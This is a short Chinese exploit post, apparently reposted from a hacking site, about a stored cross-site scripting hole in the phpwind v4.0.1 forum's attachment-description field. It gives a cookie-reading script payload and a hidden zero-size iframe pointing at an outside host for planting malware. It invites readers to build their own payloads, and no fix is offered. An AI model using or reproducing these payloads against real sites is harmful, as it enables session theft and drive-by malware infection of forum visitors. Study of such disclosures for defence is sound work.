hpwind v4.0.1真正的跨站与挂马漏洞

hpwind v4.0.1真正的跨站与挂马漏洞

漏洞程度:高危
漏洞程序:phpwind v4.0.1最新免费版
漏洞描述:利用phpwind v4.0.1论坛的发贴附件上传中的附件描述处插入任意代码!
漏洞利用:
  在phpwind v4.0.1发贴/回贴的附件上传处,有个附件描述,在此处插入脚本代码,比如插入:
以下是代码片段:
CODE:
<script>alert(document.cookie)</script>


  如图1:

 


  点击提交,发贴/回贴成功后,浏览该贴就会执行插入的代码,没有做过滤,此代码的作用是获取用户的COOKIE信息.看你怎么利用了,代码可以自己构造其它的,经测试,引号是被php过滤了的.结果如图2:


  从上图查看源文件可以看出,所插入的代码原样呆在附件描述处,没做过滤!
浏览刚发/回的贴子,结果如下图3:


  当然也可以插入框架脚本代码,即我们常说的挂马代码,如: 以下是代码片段:

CODE:
<iframe src=http://gingelly.xinwen365.com/index1.htm width=0 height=0>
                                                                                                         来自:www.hackbase.com
  

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值